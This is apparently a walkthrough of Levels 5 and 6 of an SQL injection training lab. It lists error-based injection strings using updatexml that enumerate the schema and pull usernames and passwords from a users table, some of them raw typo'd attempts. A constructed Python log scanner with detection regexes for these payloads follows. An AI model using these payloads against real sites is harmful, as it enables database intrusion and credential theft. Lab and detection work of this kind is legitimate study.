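Level 5
First, determine the injection method.
Requesting URL/?id=1' produces an error. With the 1' removed, the quotes before and after close completely, so closing with a single quote should be the injection method.
Error-based injection is used here.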
?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'),0x7e),1) --+
It reports that the subquery returns more than 1 row, so we need to add something.
Change it to this:
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1) --+
limit 0,1 the first one
limit 1,1 the second one
limit 2,1 the third one
limit 3,1 the fourth one
?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 0,1),0x7e),1) --+
?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 1,1),0x7e),1) --+ (only limit 1,1 was changed here)
?id=1' and updatexml(1,concat(0x7e,(select id from users limit 0,1),0x7e),1) --+
?id=1' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) --+
?id=1' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --+
Level 6
The injection method is different; everything else is the same as Level 5.
ID:1"
ID:1" and 1=2--
ID:1" and 1=2--
ID:1" and 1=1--
ID:1" and 1=1--
ID:1" and 1=2--
ID:1" and 1=2 --
ID:1" and update(1,concat(0x7e,(select database()),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information schema.tables where table_name = 'security'),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_name = 'security'),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security'),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 0,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 1,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 2,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 3,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 3,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 0,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 1,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 2,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select password from users limit 2,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --
ID:1" and updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1) --
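Seen from the defending side, the requests in Level 5 and Level 6 leave a recognizable trail in a web access log. The following is an added example, not part of the original walkthrough: it URL-decodes the id parameter, matches it against signatures of the payload shapes above, and applies a strict numeric allow-list. The log format, the /lab/... paths, the rule names and the assumption that id is always a plain integer are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the page); paths are placeholders and
# the query strings reuse the payload shapes shown for Level 5 and Level 6.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /lab/level5/?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /lab/level5/?id=1%27%20and%20'
    'updatexml(1,concat(0x7e,(select%20database()),0x7e),1)%20--+ HTTP/1.1" 200 730',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /lab/level6/?id=1%22%20and%20'
    'updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables'
    '%20where%20table_schema%20%3D%20%27security%27%20limit%200,1),0x7e),1)%20--+ HTTP/1.1" 200 741',
    '10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /lab/level5/?id=1%27 HTTP/1.1" 200 690',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Hypothetical rule names; each pattern targets one trait of the payloads above.
RULES = {
    "xpath_error_function": re.compile(r"\bupdatexml\s*\(", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\s*\.", re.I),
    "row_walking": re.compile(r"\blimit\s+\d+\s*,\s*1\b", re.I),
    "quote_break_with_comment": re.compile(r"""^\s*\d+\s*['"].*(--|#)""", re.S),
}

def id_values(log_line):
    """Return the URL-decoded values of the id parameter in one log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    return parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True).get("id", [])

def signature_hits(value):
    """Names of the rules that match a decoded parameter value."""
    return [name for name, rx in RULES.items() if rx.search(value)]

def is_valid_id(value):
    # Assumption: id is a plain integer, so anything else is rejected outright.
    return re.fullmatch(r"\d{1,10}", value) is not None

def scan(lines):
    """Return (line_number, rule_names) for every request that needs attention."""
    report = []
    for n, line in enumerate(lines, 1):
        for value in id_values(line):
            hits = signature_hits(value)
            if hits or not is_valid_id(value):
                report.append((n, hits))
    return report

if __name__ == "__main__":
    for line_no, hits in scan(SAMPLE_LOG):
        print(line_no, hits or ["rejected by allow-list only"])
```

The bare quote probe on the last sample line matches no signature and is caught only by the allow-list, which is why input validation together with parameterized queries, rather than pattern matching, is the actual fix.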